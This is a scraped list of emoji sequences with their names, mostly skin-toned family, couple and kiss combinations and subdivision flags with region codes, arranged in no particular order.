👨🏿❤️💋👩🏽 Kiss - Man: Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Yaren (NR-14)
👩❤️👩🏻 Couple With Heart - Woman, Woman: Light Skin Tone
🏴 Flag for Selangor (MY-10)
👨🏼👨🏼👧🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Apurímac (PE-APU)
👩👨👦👧 Family: Woman, Man, Boy, Girl
👨🏿👩🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Abkhazia (GE-AB)
🏴 Flag for Schellenberg (LI-08)
🏴 Flag for Düzce (TR-81)
👩🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩👨👶👦 Family: Woman, Man, Baby, Boy
🏴 Flag for Sonora (MX-SON)
🏴 Flag for Sassandra-Marahoué (CI-SM)
🏴 Flag for Arequipa (PE-ARE)
👩🏽❤️👩🏼 Couple With Heart - Woman: Medium Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Bouenza (CG-11)
🏴 Flag for Saint Catherine (JM-14)
🏴 Flag for Škofja Loka (SI-122)
👩🏻❤️💋👨🏼 Kiss - Woman: Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Hsinchu (TW-HSZ)
👩🏼👧🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Southern (LK-3)
👨❤️💋👨🏼 Kiss - Man, Man: Medium-Light Skin Tone
👨🏽👨🏽👧🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for León (NI-LE)
🏴 Flag for Varaždin (HR-05)
🏴 Flag for Antioquia (CO-ANT)
🏴 Flag for Sainte-Dévote Chapel (MC-SD)
🏴 Flag for Plasnica (MK-61)
👨🏾❤️👨🏻 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Light Skin Tone
🏴 Flag for West Greece (GR-G)
🏴 Flag for North Province (MV-NO)
👨❤️👩🏻 Couple With Heart - Man, Woman: Light Skin Tone
🏴 Flag for Apure (VE-C)
☿️ Mercury
🏴 Flag for Montana (US-MT)
👩🏼❤️👨🏾 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏾👨🏾👧🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Esmeraldas (EC-E)
🏴 Flag for Béchar (DZ-08)
🏴 Flag for North Holland (NL-NH)
🏴 Flag for St. Barthélemy (FR-BL)
🏴 Flag for Ouaka (CF-UK)
🏴 Flag for Red Sea (SD-RS)
🏴 Flag for Tabasco (MX-TAB)
🏴 Flag for Macau SAR China (CN-92)
🏴 Flag for Eger (HU-EG)
🏴 Flag for North Ossetia-Alania (RU-SE)
🏴 Flag for Équateur (CD-EQ)
👨🏿👨🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Basque Country (ES-PV)
👨🏽❤️💋👨🏻 Kiss - Man: Medium Skin Tone, Man: Light Skin Tone
🏴 Flag for Gafsa (TN-71)
🏴 Flag for Tavastia Proper (FI-06)
🏴 Flag for Razavi Khorasan (IR-30)
🏴 Flag for Dobje (SI-154)
👨🏼❤️💋👨🏻 Kiss - Man: Medium-Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Retalhuleu (GT-RE)
🏴 Flag for Line Islands (KI-L)
🏴 Flag for West Azarbaijan (IR-02)
🏴 Flag for Nariño (CO-NAR)
🏴 Flag for Mashonaland Central (ZW-MC)
👨🏻❤️👨🏻 Couple With Heart - Man: Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Emilia-Romagna (IT-45)
🏴 Flag for Valencian Community (ES-VC)
🏴 Flag for Samut Songkhram (TH-75)
🏴 Flag for Île-de-France (FR-IDF)
🏴 Flag for Maseru (LS-A)
🏴 Flag for Marsabit (KE-25)
🏴 Flag for Adrar (DZ-01)
🏴 Flag for Usulután (SV-US)
🏴 Flag for Mazsalaca (LV-060)
👩🏻❤️💋👩🏾 Kiss - Woman: Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏾👦🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Chaiyaphum (TH-36)
🏴 Flag for Central Visayas (PH-07)
🏴 Flag for Chumphon (TH-86)
🏴 Flag for Zanzan (CI-ZZ)
🏴 Flag for Castile and León (ES-CL)
👨🏻👨🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Al Bahah (SA-11)
🏴 Flag for Sint Eustatius (BQ-SE)
🏴 Flag for Åland Islands (FI-01)
🏴 Flag for Heredia (CR-H)
🏴 Flag for Kütahya (TR-43)
🏴 Flag for Vaisigano (WS-VS)
👨🏿❤️💋👩🏼 Kiss - Man: Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Kranj (SI-052)
🏴 Flag for Zulia (VE-V)
👩🏽❤️💋👨🏼 Kiss - Woman: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Capellen (LU-CA)
👩🏽❤️👩🏾 Couple With Heart - Woman: Medium Skin Tone, Woman: Medium-Dark Skin Tone
👨🏼👨🏼👧🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for East Berbice-Corentyne (GY-EB)
🏴 Flag for Lopburi (TH-16)
🏴 Flag for Luqa (MT-25)
👨🏻❤️👨🏼 Couple With Heart - Man: Light Skin Tone, Man: Medium-Light Skin Tone
👨🏽👨🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩🏻❤️👩🏽 Couple With Heart - Woman: Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Baja California Sur (MX-BCS)
🏴 Flag for Beni Suef (EG-BNS)
🏴 Flag for Phatthalung (TH-93)
🏴 Flag for Tanga (TZ-25)
🏴 Flag for Oriental (MA-04)
👨🏾👨🏾👧🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏿👩🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Gorenja Vas–Poljane (SI-027)
🏴 Flag for Sangre Grande (TT-SGE)
🏴 Flag for Koknese (LV-046)
🏴 Flag for Odranci (SI-086)
🏴 Flag for Nelson (NZ-NSN)
🏴 Flag for Szabolcs-Szatmár-Bereg (HU-SZ)
👩🏾❤️💋👨🏽 Kiss - Woman: Medium-Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for Sveti Jurij v Slovenskih Goricah (SI-210)
߷ NKo Symbol Gbakurunen
🏴 Flag for Delta (NG-DE)
🏴 Flag for Căușeni (MD-CS)
👩🏽👧🏽👦🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Isla de la Juventud (CU-99)
🏴 Flag for Svay Rieng (KH-20)
🏴 Flag for Hadjer-Lamis (TD-HL)
🏴 Flag for Gifu (JP-21)
🏴 Flag for Jelgava Municipality (LV-041)
🏴 Flag for Federally Administered Tribal Areas (PK-TA)
🏴 Flag for Xewkija (MT-62)
🏴 Flag for Guidimaka (MR-10)
🏴 Flag for Aračinovo (MK-02)
🏴 Flag for Log–Dragomer (SI-208)
🏴 Flag for Šmartno ob Paki (SI-125)
🏴 Flag for Capital District (CO-DC)
🏴 Flag for Ventspils Municipality (LV-106)
🏴 Flag for South Central Province (MV-SC)
🏴 Flag for Assam (IN-AS)
🏴 Flag for Alytus Municipality (LT-02)
🏴 Flag for Hưng Yên (VN-66)
👨🏻👨🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👨🏼👨🏼👧🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for San Marcos (GT-SM)
👨🏼👨🏼👦🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Schleswig-Holstein (DE-SH)
👨👨👶👧 Family: Man, Man, Baby, Girl
️ Variation Selector-16
👨🏽👨🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👨🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👨🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👨🏻👨🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone
👨🏼👨🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏽👨🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👨🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👨🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone
👩❤️👨🏿 Couple With Heart - Woman, Man: Dark Skin Tone
🏴 Flag for Cantabria (ES-CB)
🏴 Flag for Unity (SS-UY)
👩🏼👶🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👶🏽👦🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👶🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👶🏿👦🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👶🏻👧🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👩🏼👶🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽👶🏽👧🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👶🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏽👶🏽👶🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👶🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👶🏿👶🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👨🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone
👩🏼👨🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👨🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👨🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👨🏻👦🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
👩🏼👶🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏼👨🏼👦🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👨🏽👦🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👨🏾👦🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👦🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
👩🏽👨🏽👦🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👨🏾👦🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👨🏿👦🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👩🏼👨🏼👦🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👨🏽👦🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👦🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏻👨🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone
👩🏽👨🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone
👩🏻👨🏻👦🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👦🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏼👨🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏻👨🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
👩🏼👨🏼👧🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👨🏽👧🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👨🏾👧🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👧🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👨🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
👩🏽👨🏽👧🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩🏿👨🏿👧🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👨🏻👧🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👧🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👨🏽👧🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👧🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👨🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👨🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏻👨🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏼👨🏼👶🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏾👨🏾👶🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👶🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👨🏻👶🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👩🏼👨🏼👶🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽👨🏽👶🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
👩🏿👨🏿👶🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👨🏻👶🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👶🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👨🏽👶🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👶🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👨🏿👶🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
👩🏼👩🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏻👩🏻👦🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
👩🏼👩🏼👦🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏾👩🏾👦🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👩🏿👦🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
👩🏿👩🏿👦🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
👩🏽👩🏽👦🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👩🏾👦🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👩🏿👦🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👦🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👩🏼👩🏼👦🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👦🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👦🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏻👩🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone
👩🏼👩🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽👩🏽👦🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏽👩🏽👧🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏻👩🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
👩🏽👩🏽👧🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👩🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👩🏿👧🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👧🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👩🏼👩🏼👧🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👧🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👧🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👩🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👩🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone
👨🏾👩🏾👧🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏼👩🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👩🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏼👩🏼👶🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👩🏽👶🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👩🏾👶🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👩🏻👶🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👩🏽👩🏽👶🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👩🏾👶🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👶🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
👩🏼👩🏼👶🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👶🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👶🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
👩🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Maluku Islands (ID-ML)
👩🏿👶🏿👧🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Southern Denmark (DK-83)
🏴 Flag for Skopje (MK-85)
👨🏼❤️💋👩 Kiss - Man: Medium-Light Skin Tone, Woman
🏴 Flag for Beja (PT-02)
🏴 Flag for Sardinia (IT-88)
🏴 Flag for Bavaria (DE-BY)
🏴 Flag for East New Britain (PG-EBR)
🏴 Flag for Trentino-South Tyrol (IT-32)
🏴 Flag for Tennessee (US-TN)
🏴 Flag for Saskatchewan (CA-SK)
🏴 Flag for Funafuti (TV-FUN)
🏴 Flag for Gorno-Badakhshan (TJ-GB)
🏴 Flag for Banaadir (SO-BN)
🏴 Flag for Radenci (SI-100)
🏴 Flag for Baden-Württemberg (DE-BW)
👩🏿👧🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Carabobo (VE-G)
Zero Width Joiner
🏴 Flag for Nakuru (KE-31)
🏴 Flag for Maritime (TG-M)
🏴 Flag for Borno (NG-BO)
🏴 Flag for Transnistria (MD-SN)
🏴 Flag for Tehran (IR-07)
🏴 Flag for Dagestan (RU-DA)
🏴 Flag for Al Wusta (OM-WU)
🏴 Flag for Ústecký kraj (CZ-42)
🏴 Flag for Kuala Lumpur (MY-14)
🏴 Flag for Ayacucho (PE-AYA)
🏴 Flag for Kiev (UA-30)
🏴 Flag for Saint Philip (AG-08)
🏴 Flag for Mdina (MT-29)
🏴 Flag for Northern Ireland (GB-NIR)
🏴 Flag for Auvergne-Rhône-Alpes (FR-ARA)
🏴 Flag for Durango (MX-DUR)
👨🏼👩🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Eastern (LK-5)
🏴 Flag for Ogun (NG-OG)
🏴 Flag for Jafara (LY-JI)
🏴 Flag for Skåne (SE-M)
👨🏽👩🏽👧🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👩🏾👧🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Mato Grosso do Sul (BR-MS)
🏴 Flag for Santa Rosa (GT-SR)
👨🏼👩🏼👧🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Braslovče (SI-151)
